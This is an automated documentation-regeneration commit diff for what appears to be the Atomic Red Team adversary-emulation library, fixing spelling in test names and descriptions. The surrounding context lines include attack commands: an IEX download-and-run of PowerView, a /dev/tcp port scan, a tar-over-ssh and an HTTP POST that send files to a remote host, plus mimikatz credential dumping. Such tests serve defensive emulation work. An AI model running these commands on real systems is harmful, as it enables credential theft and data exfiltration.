Generated docs from job=generate-docs branch=master [ci skip]

2023-05-31 20:51:23 +00:00
parent 65294196d0
commit a59de488ff
22 changed files with 62 additions and 62 deletions
@@ -1132,8 +1132,8 @@ collection,T1125,Video Capture,1,Registry artefact when application use webcam,6
 collection,T1114.003,Email Collection: Email Forwarding Rule,1,Office365 - Email Forwarding,3234117e-151d-4254-9150-3d0bac41e38c,powershell
 collection,T1056.002,Input Capture: GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
 collection,T1056.002,Input Capture: GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
-collection,T1039,Data from Network Shared Drive,1,Copy a sensitive File over Administive share with copy,6ed67921-1774-44ba-bac6-adb51ed60660,command_prompt
-collection,T1039,Data from Network Shared Drive,2,Copy a sensitive File over Administive share with Powershell,7762e120-5879-44ff-97f8-008b401b9a98,powershell
+collection,T1039,Data from Network Shared Drive,1,Copy a sensitive File over Administrative share with copy,6ed67921-1774-44ba-bac6-adb51ed60660,command_prompt
+collection,T1039,Data from Network Shared Drive,2,Copy a sensitive File over Administrative share with Powershell,7762e120-5879-44ff-97f8-008b401b9a98,powershell
 collection,T1056.004,Input Capture: Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
 lateral-movement,T1091,Replication Through Removable Media,1,USB Malware Spread Simulation,d44b7297-622c-4be8-ad88-ec40d7563c75,powershell
 lateral-movement,T1021.002,Remote Services: SMB/Windows Admin Shares,1,Map admin share,3386975b-367a-4fbb-9d77-4dcf3639ffd3,command_prompt
@@ -1534,7 +1534,7 @@ discovery,T1018,Remote System Discovery,15,Enumerate domain computers within Act
 discovery,T1018,Remote System Discovery,16,Enumerate Active Directory Computers with Get-AdComputer,97e89d9e-e3f5-41b5-a90f-1e0825df0fdf,powershell
 discovery,T1018,Remote System Discovery,17,Enumerate Active Directory Computers with ADSISearcher,64ede6ac-b57a-41c2-a7d1-32c6cd35397d,powershell
 discovery,T1018,Remote System Discovery,18,Get-DomainController with PowerView,b9d2e8ca-5520-4737-8076-4f08913da2c4,powershell
-discovery,T1018,Remote System Discovery,19,Get-wmiobject to Enumerate Domain Controllers,e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad,powershell
+discovery,T1018,Remote System Discovery,19,Get-WmiObject to Enumerate Domain Controllers,e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad,powershell
 discovery,T1018,Remote System Discovery,20,Remote System Discovery - net group Domain Controller,5843529a-5056-4bc1-9c13-a311e2af4ca0,command_prompt
 discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
 discovery,T1046,Network Service Discovery,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
@@ -771,8 +771,8 @@ collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With Po
 collection,T1557.001,Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay,1,LLMNR Poisoning with Inveigh (PowerShell),deecd55f-afe0-4a62-9fba-4d1ba2deb321,powershell
 collection,T1125,Video Capture,1,Registry artefact when application use webcam,6581e4a7-42e3-43c5-a0d2-5a0d62f9702a,command_prompt
 collection,T1056.002,Input Capture: GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
-collection,T1039,Data from Network Shared Drive,1,Copy a sensitive File over Administive share with copy,6ed67921-1774-44ba-bac6-adb51ed60660,command_prompt
-collection,T1039,Data from Network Shared Drive,2,Copy a sensitive File over Administive share with Powershell,7762e120-5879-44ff-97f8-008b401b9a98,powershell
+collection,T1039,Data from Network Shared Drive,1,Copy a sensitive File over Administrative share with copy,6ed67921-1774-44ba-bac6-adb51ed60660,command_prompt
+collection,T1039,Data from Network Shared Drive,2,Copy a sensitive File over Administrative share with Powershell,7762e120-5879-44ff-97f8-008b401b9a98,powershell
 collection,T1056.004,Input Capture: Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
 lateral-movement,T1091,Replication Through Removable Media,1,USB Malware Spread Simulation,d44b7297-622c-4be8-ad88-ec40d7563c75,powershell
 lateral-movement,T1021.002,Remote Services: SMB/Windows Admin Shares,1,Map admin share,3386975b-367a-4fbb-9d77-4dcf3639ffd3,command_prompt
@@ -1057,7 +1057,7 @@ discovery,T1018,Remote System Discovery,15,Enumerate domain computers within Act
 discovery,T1018,Remote System Discovery,16,Enumerate Active Directory Computers with Get-AdComputer,97e89d9e-e3f5-41b5-a90f-1e0825df0fdf,powershell
 discovery,T1018,Remote System Discovery,17,Enumerate Active Directory Computers with ADSISearcher,64ede6ac-b57a-41c2-a7d1-32c6cd35397d,powershell
 discovery,T1018,Remote System Discovery,18,Get-DomainController with PowerView,b9d2e8ca-5520-4737-8076-4f08913da2c4,powershell
-discovery,T1018,Remote System Discovery,19,Get-wmiobject to Enumerate Domain Controllers,e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad,powershell
+discovery,T1018,Remote System Discovery,19,Get-WmiObject to Enumerate Domain Controllers,e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad,powershell
 discovery,T1018,Remote System Discovery,20,Remote System Discovery - net group Domain Controller,5843529a-5056-4bc1-9c13-a311e2af4ca0,command_prompt
 discovery,T1046,Network Service Discovery,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell
 discovery,T1046,Network Service Discovery,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell
@@ -1805,8 +1805,8 @@
  - Atomic Test #1: AppleScript - Prompt User for Password [macos]
  - Atomic Test #2: PowerShell - Prompt User for Password [windows]
 - [T1039 Data from Network Shared Drive](../../T1039/T1039.md)
-  - Atomic Test #1: Copy a sensitive File over Administive share with copy [windows]
-  - Atomic Test #2: Copy a sensitive File over Administive share with Powershell [windows]
+  - Atomic Test #1: Copy a sensitive File over Administrative share with copy [windows]
+  - Atomic Test #2: Copy a sensitive File over Administrative share with Powershell [windows]
 - T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -2369,7 +2369,7 @@
  - Atomic Test #16: Enumerate Active Directory Computers with Get-AdComputer [windows]
  - Atomic Test #17: Enumerate Active Directory Computers with ADSISearcher [windows]
  - Atomic Test #18: Get-DomainController with PowerView [windows]
-  - Atomic Test #19: Get-wmiobject to Enumerate Domain Controllers [windows]
+  - Atomic Test #19: Get-WmiObject to Enumerate Domain Controllers [windows]
  - Atomic Test #20: Remote System Discovery - net group Domain Controller [windows]
 - [T1046 Network Service Discovery](../../T1046/T1046.md)
  - Atomic Test #1: Port Scan [linux, macos]
@@ -1281,8 +1281,8 @@
 - [T1056.002 Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md)
  - Atomic Test #2: PowerShell - Prompt User for Password [windows]
 - [T1039 Data from Network Shared Drive](../../T1039/T1039.md)
-  - Atomic Test #1: Copy a sensitive File over Administive share with copy [windows]
-  - Atomic Test #2: Copy a sensitive File over Administive share with Powershell [windows]
+  - Atomic Test #1: Copy a sensitive File over Administrative share with copy [windows]
+  - Atomic Test #2: Copy a sensitive File over Administrative share with Powershell [windows]
 - T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1698,7 +1698,7 @@
  - Atomic Test #16: Enumerate Active Directory Computers with Get-AdComputer [windows]
  - Atomic Test #17: Enumerate Active Directory Computers with ADSISearcher [windows]
  - Atomic Test #18: Get-DomainController with PowerView [windows]
-  - Atomic Test #19: Get-wmiobject to Enumerate Domain Controllers [windows]
+  - Atomic Test #19: Get-WmiObject to Enumerate Domain Controllers [windows]
  - Atomic Test #20: Remote System Discovery - net group Domain Controller [windows]
 - [T1046 Network Service Discovery](../../T1046/T1046.md)
  - Atomic Test #3: Port Scan NMap for Windows [windows]
@@ -1870,7 +1870,7 @@ defense-evasion:
      - linux
      input_arguments:
        rootkit_source_path:
-          description: Path to the rootkit source. Used when prerequistes are fetched.
+          description: Path to the rootkit source. Used when prerequisites are fetched.
          type: path
          default: PathToAtomicsFolder/T1014/src/Linux
        rootkit_path:
@@ -1917,7 +1917,7 @@ defense-evasion:
      - linux
      input_arguments:
        rootkit_source_path:
-          description: Path to the rootkit source. Used when prerequistes are fetched.
+          description: Path to the rootkit source. Used when prerequisites are fetched.
          type: path
          default: PathToAtomicsFolder/T1014/src/Linux
        rootkit_name:
@@ -21171,7 +21171,7 @@ defense-evasion:
          type: url
          default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
        local_path:
-          description: Local path/filename to save the dowloaded file to
+          description: Local path/filename to save the downloaded file to
          type: path
          default: Atomic-license.txt
      executor:
@@ -23449,7 +23449,7 @@ defense-evasion:
        as a part of the process. \nCertain processes are not typically observed compiling
        C# code, but can do so without touching disk. This can be used to unpack a
        payload for execution.\nThe exe file that will be executed is named as T1027.004_DynamicCompile.exe
-        is containted in the 'bin' folder of this atomic, and the source code to the
+        is contained in the 'bin' folder of this atomic, and the source code to the
        file is in the 'src' folder.\nUpon execution, the exe will print 'T1027.004
        Dynamic Compile'.\n"
      supported_platforms:
@@ -25354,7 +25354,7 @@ defense-evasion:
    - name: HTML Smuggling Remote Payload
      auto_generated_guid: 30cbeda4-08d9-42f1-8685-197fad677734
      description: "The HTML file will download an ISO file from [T1553.005](https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1553.005/bin/FeelTheBurn.iso)
-        without userinteraction. \nThe HTML file is based off of the work from [Stan
+        without user interaction. \nThe HTML file is based off of the work from [Stan
        Hegt](https://outflank.nl/blog/2018/08/14/html-smuggling-explained/)\n"
      supported_platforms:
      - windows
@@ -46013,7 +46013,7 @@ execution:
        will be displayed on the screen if it exists.\nA common feedback message is
        that \"No instance(s) Available\" if the service queried is not running.\nA
        common error message is \"Node - (provided IP or default)  ERROR Description
-        =The RPC server is unavailable\" \nif the provided remote host is unreacheable\n"
+        =The RPC server is unavailable\" \nif the provided remote host is unreachable\n"
      supported_platforms:
      - windows
      input_arguments:
@@ -79691,7 +79691,7 @@ collection:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      identifier: T1039
    atomic_tests:
-    - name: Copy a sensitive File over Administive share with copy
+    - name: Copy a sensitive File over Administrative share with copy
      auto_generated_guid: 6ed67921-1774-44ba-bac6-adb51ed60660
      description: |-
        Copy from sensitive File from the c$ of another LAN computer with copy cmd
@@ -79739,7 +79739,7 @@ collection:
          del %TEMP%\#{local_file}
        name: command_prompt
        elevation_required: true
-    - name: Copy a sensitive File over Administive share with Powershell
+    - name: Copy a sensitive File over Administrative share with Powershell
      auto_generated_guid: 7762e120-5879-44ff-97f8-008b401b9a98
      description: |-
        Copy from sensitive File from the c$ of another LAN computer with powershell
@@ -89041,7 +89041,7 @@ credential-access:

        Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.

-        Successful execution of this test will display multiple useranames and passwords/hashes to the screen.
+        Successful execution of this test will display multiple usernames and passwords/hashes to the screen.
      supported_platforms:
      - windows
      dependency_executor_name: command_prompt
@@ -89143,7 +89143,7 @@ credential-access:
        mimikatz script.\nIf Mimikatz runs successfully you will see several usernames
        and hashes output to the screen.\nCommon failures include seeing an \\\"access
        denied\\\" error which results when Anti-Virus blocks execution. \nOr, if
-        you try to run the test without the required administrative privleges you
+        you try to run the test without the required administrative privileges you
        will see this error near the bottom of the output to the screen \"ERROR kuhl_m_sekurlsa_acquireLSA\"\n"
      supported_platforms:
      - windows
@@ -93660,7 +93660,7 @@ credential-access:
      auto_generated_guid: a0bced08-3fc5-4d8b-93b7-e8344739376e
      description: "The following Atomic will run Get-ADReplAccount from DSInternals.\nUpon
        successful execution, domain and credentials will appear in stdout. \n[Reference](https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/)
-        CrowdStrike StellerParticle.\nhttps://www.dsinternals.com/en/retrieving-active-directory-passwords-remotely/\n"
+        CrowdStrike StellarParticle.\nhttps://www.dsinternals.com/en/retrieving-active-directory-passwords-remotely/\n"
      supported_platforms:
      - windows
      input_arguments:
@@ -101143,7 +101143,7 @@ discovery:
          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose
        name: powershell
-    - name: Get-wmiobject to Enumerate Domain Controllers
+    - name: Get-WmiObject to Enumerate Domain Controllers
      auto_generated_guid: e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad
      description: |
        The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers.
@@ -101265,7 +101265,7 @@ discovery:
      description: |
        Scan ports to check for listening ports with Nmap.

-        Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of adresseses on port 80 to determine if listening. Results will be via stdout.
+        Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.
      supported_platforms:
      - linux
      - macos
@@ -112639,7 +112639,7 @@ exfiltration:
        name: sh
    - name: DNSExfiltration (doh)
      auto_generated_guid: c943d285-ada3-45ca-b3aa-7cd6500c6a48
-      description: "DNSExfiltrator allows for transfering (exfiltrate) a file over
+      description: "DNSExfiltrator allows for transferring (exfiltrate) a file over
        a DNS request covert channel. This is basically a data leak testing tool allowing
        to exfiltrate data over a covert channel.\n!!! Test will fail without a domain
        under your control with A record and NS record !!! \nSee this github page
@@ -113355,7 +113355,7 @@ exfiltration:
      auto_generated_guid: ec3a835e-adca-4c7c-88d2-853b69c11bb9
      description: |
        Exfiltration of specified file over SMTP.
-        Upon successful execution, powershell will send an email with attached file to exfiltrateto a remote address. Results will be via stdout.
+        Upon successful execution, powershell will send an email with attached file to exfiltrate to a remote address. Results will be via stdout.
      supported_platforms:
      - windows
      executor:
@@ -1500,7 +1500,7 @@ defense-evasion:
      - linux
      input_arguments:
        rootkit_source_path:
-          description: Path to the rootkit source. Used when prerequistes are fetched.
+          description: Path to the rootkit source. Used when prerequisites are fetched.
          type: path
          default: PathToAtomicsFolder/T1014/src/Linux
        rootkit_path:
@@ -1547,7 +1547,7 @@ defense-evasion:
      - linux
      input_arguments:
        rootkit_source_path:
-          description: Path to the rootkit source. Used when prerequistes are fetched.
+          description: Path to the rootkit source. Used when prerequisites are fetched.
          type: path
          default: PathToAtomicsFolder/T1014/src/Linux
        rootkit_name:
@@ -66897,7 +66897,7 @@ discovery:
      description: |
        Scan ports to check for listening ports with Nmap.

-        Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of adresseses on port 80 to determine if listening. Results will be via stdout.
+        Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.
      supported_platforms:
      - linux
      - macos
@@ -63841,7 +63841,7 @@ discovery:
      description: |
        Scan ports to check for listening ports with Nmap.

-        Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of adresseses on port 80 to determine if listening. Results will be via stdout.
+        Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.
      supported_platforms:
      - linux
      - macos
@@ -18342,7 +18342,7 @@ defense-evasion:
          type: url
          default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
        local_path:
-          description: Local path/filename to save the dowloaded file to
+          description: Local path/filename to save the downloaded file to
          type: path
          default: Atomic-license.txt
      executor:
@@ -20510,7 +20510,7 @@ defense-evasion:
        as a part of the process. \nCertain processes are not typically observed compiling
        C# code, but can do so without touching disk. This can be used to unpack a
        payload for execution.\nThe exe file that will be executed is named as T1027.004_DynamicCompile.exe
-        is containted in the 'bin' folder of this atomic, and the source code to the
+        is contained in the 'bin' folder of this atomic, and the source code to the
        file is in the 'src' folder.\nUpon execution, the exe will print 'T1027.004
        Dynamic Compile'.\n"
      supported_platforms:
@@ -21872,7 +21872,7 @@ defense-evasion:
    - name: HTML Smuggling Remote Payload
      auto_generated_guid: 30cbeda4-08d9-42f1-8685-197fad677734
      description: "The HTML file will download an ISO file from [T1553.005](https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1553.005/bin/FeelTheBurn.iso)
-        without userinteraction. \nThe HTML file is based off of the work from [Stan
+        without user interaction. \nThe HTML file is based off of the work from [Stan
        Hegt](https://outflank.nl/blog/2018/08/14/html-smuggling-explained/)\n"
      supported_platforms:
      - windows
@@ -40194,7 +40194,7 @@ execution:
        will be displayed on the screen if it exists.\nA common feedback message is
        that \"No instance(s) Available\" if the service queried is not running.\nA
        common error message is \"Node - (provided IP or default)  ERROR Description
-        =The RPC server is unavailable\" \nif the provided remote host is unreacheable\n"
+        =The RPC server is unavailable\" \nif the provided remote host is unreachable\n"
      supported_platforms:
      - windows
      input_arguments:
@@ -69220,7 +69220,7 @@ collection:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      identifier: T1039
    atomic_tests:
-    - name: Copy a sensitive File over Administive share with copy
+    - name: Copy a sensitive File over Administrative share with copy
      auto_generated_guid: 6ed67921-1774-44ba-bac6-adb51ed60660
      description: |-
        Copy from sensitive File from the c$ of another LAN computer with copy cmd
@@ -69268,7 +69268,7 @@ collection:
          del %TEMP%\#{local_file}
        name: command_prompt
        elevation_required: true
-    - name: Copy a sensitive File over Administive share with Powershell
+    - name: Copy a sensitive File over Administrative share with Powershell
      auto_generated_guid: 7762e120-5879-44ff-97f8-008b401b9a98
      description: |-
        Copy from sensitive File from the c$ of another LAN computer with powershell
@@ -77300,7 +77300,7 @@ credential-access:

        Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.

-        Successful execution of this test will display multiple useranames and passwords/hashes to the screen.
+        Successful execution of this test will display multiple usernames and passwords/hashes to the screen.
      supported_platforms:
      - windows
      dependency_executor_name: command_prompt
@@ -77402,7 +77402,7 @@ credential-access:
        mimikatz script.\nIf Mimikatz runs successfully you will see several usernames
        and hashes output to the screen.\nCommon failures include seeing an \\\"access
        denied\\\" error which results when Anti-Virus blocks execution. \nOr, if
-        you try to run the test without the required administrative privleges you
+        you try to run the test without the required administrative privileges you
        will see this error near the bottom of the output to the screen \"ERROR kuhl_m_sekurlsa_acquireLSA\"\n"
      supported_platforms:
      - windows
@@ -81459,7 +81459,7 @@ credential-access:
      auto_generated_guid: a0bced08-3fc5-4d8b-93b7-e8344739376e
      description: "The following Atomic will run Get-ADReplAccount from DSInternals.\nUpon
        successful execution, domain and credentials will appear in stdout. \n[Reference](https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/)
-        CrowdStrike StellerParticle.\nhttps://www.dsinternals.com/en/retrieving-active-directory-passwords-remotely/\n"
+        CrowdStrike StellarParticle.\nhttps://www.dsinternals.com/en/retrieving-active-directory-passwords-remotely/\n"
      supported_platforms:
      - windows
      input_arguments:
@@ -87277,7 +87277,7 @@ discovery:
          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose
        name: powershell
-    - name: Get-wmiobject to Enumerate Domain Controllers
+    - name: Get-WmiObject to Enumerate Domain Controllers
      auto_generated_guid: e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad
      description: |
        The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers.
@@ -97867,7 +97867,7 @@ exfiltration:
    atomic_tests:
    - name: DNSExfiltration (doh)
      auto_generated_guid: c943d285-ada3-45ca-b3aa-7cd6500c6a48
-      description: "DNSExfiltrator allows for transfering (exfiltrate) a file over
+      description: "DNSExfiltrator allows for transferring (exfiltrate) a file over
        a DNS request covert channel. This is basically a data leak testing tool allowing
        to exfiltrate data over a covert channel.\n!!! Test will fail without a domain
        under your control with A record and NS record !!! \nSee this github page
@@ -98503,7 +98503,7 @@ exfiltration:
      auto_generated_guid: ec3a835e-adca-4c7c-88d2-853b69c11bb9
      description: |
        Exfiltration of specified file over SMTP.
-        Upon successful execution, powershell will send an email with attached file to exfiltrateto a remote address. Results will be via stdout.
+        Upon successful execution, powershell will send an email with attached file to exfiltrate to a remote address. Results will be via stdout.
      supported_platforms:
      - windows
      executor:
@@ -355,7 +355,7 @@ Parses secrets hidden in the LSASS process with python. Similar to mimikatz's se

 Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.

-Successful execution of this test will display multiple useranames and passwords/hashes to the screen.
+Successful execution of this test will display multiple usernames and passwords/hashes to the screen.

 **Supported Platforms:** Windows

@@ -512,7 +512,7 @@ Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
 Dumps credentials from memory via Powershell by invoking a remote mimikatz script.
 If Mimikatz runs successfully you will see several usernames and hashes output to the screen.
 Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution. 
-Or, if you try to run the test without the required administrative privleges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA"
+Or, if you try to run the test without the required administrative privileges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA"

 **Supported Platforms:** Windows

@@ -75,7 +75,7 @@ Invoke-FetchFromZip $zipUrl "x64/mimikatz.exe" $basePath
 ## Atomic Test #2 - Run DSInternals Get-ADReplAccount
 The following Atomic will run Get-ADReplAccount from DSInternals.
 Upon successful execution, domain and credentials will appear in stdout. 
-[Reference](https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/) CrowdStrike StellerParticle.
+[Reference](https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/) CrowdStrike StellarParticle.
 https://www.dsinternals.com/en/retrieving-active-directory-passwords-remotely/

 **Supported Platforms:** Windows
@@ -32,7 +32,7 @@ Loadable Kernel Module based Rootkit
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| rootkit_source_path | Path to the rootkit source. Used when prerequistes are fetched. | path | PathToAtomicsFolder/T1014/src/Linux|
+| rootkit_source_path | Path to the rootkit source. Used when prerequisites are fetched. | path | PathToAtomicsFolder/T1014/src/Linux|
 | rootkit_path | Path To rootkit | string | PathToAtomicsFolder/T1014/bin|
 | rootkit_name | Module name | string | T1014|

@@ -91,7 +91,7 @@ Loadable Kernel Module based Rootkit
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| rootkit_source_path | Path to the rootkit source. Used when prerequistes are fetched. | path | PathToAtomicsFolder/T1014/src/Linux|
+| rootkit_source_path | Path to the rootkit source. Used when prerequisites are fetched. | path | PathToAtomicsFolder/T1014/src/Linux|
 | rootkit_name | Module name | string | T1014|


@@ -378,7 +378,7 @@ sudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate
 <br/>

 ## Atomic Test #9 - DNS Server Discovery Using nslookup
-Identify System domain dns controller on an endpoint using nslookup ldap query. This tool is being abused by Qakbot malware to gather information on the domain
+Identify System domain dns controller on an endpoint using nslookup ldap query. This tool is being abused by qakbot malware to gather information on the domain
 controller of the targeted or compromised host. reference https://securelist.com/qakbot-technical-analysis/103931/

 **Supported Platforms:** Windows
@@ -45,7 +45,7 @@ Adversaries may also target discovery of network infrastructure as well as lever

 - [Atomic Test #18 - Get-DomainController with PowerView](#atomic-test-18---get-domaincontroller-with-powerview)

- [Atomic Test #19 - Get-wmiobject to Enumerate Domain Controllers](#atomic-test-19---get-wmiobject-to-enumerate-domain-controllers)
+- [Atomic Test #19 - Get-WmiObject to Enumerate Domain Controllers](#atomic-test-19---get-wmiobject-to-enumerate-domain-controllers)

 - [Atomic Test #20 - Remote System Discovery - net group Domain Controller](#atomic-test-20---remote-system-discovery---net-group-domain-controller)

@@ -74,7 +74,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
 ## Atomic Test #2 - Dynamic C# Compile
 When C# is compiled dynamically, a .cmdline file will be created as a part of the process. 
 Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can be used to unpack a payload for execution.
-The exe file that will be executed is named as T1027.004_DynamicCompile.exe is containted in the 'bin' folder of this atomic, and the source code to the file is in the 'src' folder.
+The exe file that will be executed is named as T1027.004_DynamicCompile.exe is contained in the 'bin' folder of this atomic, and the source code to the file is in the 'src' folder.
 Upon execution, the exe will print 'T1027.004 Dynamic Compile'.

 **Supported Platforms:** Windows
@@ -14,7 +14,7 @@ For example, JavaScript Blobs can be abused to dynamically generate malicious fi
 <br/>

 ## Atomic Test #1 - HTML Smuggling Remote Payload
-The HTML file will download an ISO file from [T1553.005](https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1553.005/bin/FeelTheBurn.iso) without userinteraction. 
+The HTML file will download an ISO file from [T1553.005](https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1553.005/bin/FeelTheBurn.iso) without user interaction. 
 The HTML file is based off of the work from [Stan Hegt](https://outflank.nl/blog/2018/08/14/html-smuggling-explained/)

 **Supported Platforms:** Windows
@@ -343,7 +343,7 @@ https://wietze.github.io/blog/windows-command-line-obfuscation
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | remote_file | URL of file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
-| local_path | Local path/filename to save the dowloaded file to | path | Atomic-license.txt|
+| local_path | Local path/filename to save the downloaded file to | path | Atomic-license.txt|

 #### Run it with these steps! 
 1. Copy the following command into the command prompt after replacing #{remote_file} and #{local_path} with your desired URL and filename.
@@ -4,14 +4,14 @@

 ## Atomic Tests

- [Atomic Test #1 - Copy a sensitive File over Administive share with copy](#atomic-test-1---copy-a-sensitive-file-over-administive-share-with-copy)
+- [Atomic Test #1 - Copy a sensitive File over Administrative share with copy](#atomic-test-1---copy-a-sensitive-file-over-administrative-share-with-copy)

- [Atomic Test #2 - Copy a sensitive File over Administive share with Powershell](#atomic-test-2---copy-a-sensitive-file-over-administive-share-with-powershell)
+- [Atomic Test #2 - Copy a sensitive File over Administrative share with Powershell](#atomic-test-2---copy-a-sensitive-file-over-administrative-share-with-powershell)


 <br/>

-## Atomic Test #1 - Copy a sensitive File over Administive share with copy
+## Atomic Test #1 - Copy a sensitive File over Administrative share with copy
 Copy from sensitive File from the c$ of another LAN computer with copy cmd
 https://twitter.com/SBousseaden/status/1211636381086339073

@@ -73,7 +73,7 @@ Out-File -FilePath "\\#{remote}\C$\#{share_file}"
 <br/>
 <br/>

-## Atomic Test #2 - Copy a sensitive File over Administive share with Powershell
+## Atomic Test #2 - Copy a sensitive File over Administrative share with Powershell
 Copy from sensitive File from the c$ of another LAN computer with powershell
 https://twitter.com/SBousseaden/status/1211636381086339073

@@ -67,7 +67,7 @@ for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo po
 ## Atomic Test #2 - Port Scan Nmap
 Scan ports to check for listening ports with Nmap.

-Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of adresseses on port 80 to determine if listening. Results will be via stdout.
+Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.

 **Supported Platforms:** Linux, macOS

@@ -121,7 +121,7 @@ An adversary might use WMI to check if a certain Remote Service is running on a
 When the test completes, a service information will be displayed on the screen if it exists.
 A common feedback message is that "No instance(s) Available" if the service queried is not running.
 A common error message is "Node - (provided IP or default)  ERROR Description =The RPC server is unavailable" 
-if the provided remote host is unreacheable
+if the provided remote host is unreachable

 **Supported Platforms:** Windows

@@ -171,7 +171,7 @@ Invoke-WebRequest -Uri #{ip_address} -Method POST -Body $content

 ## Atomic Test #5 - Exfiltration Over Alternative Protocol - SMTP
 Exfiltration of specified file over SMTP.
-Upon successful execution, powershell will send an email with attached file to exfiltrateto a remote address. Results will be via stdout.
+Upon successful execution, powershell will send an email with attached file to exfiltrate to a remote address. Results will be via stdout.

 **Supported Platforms:** Windows

@@ -96,7 +96,7 @@ tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{
 <br/>

 ## Atomic Test #3 - DNSExfiltration (doh)
-DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.
+DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.
 !!! Test will fail without a domain under your control with A record and NS record !!! 
 See this github page for more details - https://github.com/Arno0x/DNSExfiltrator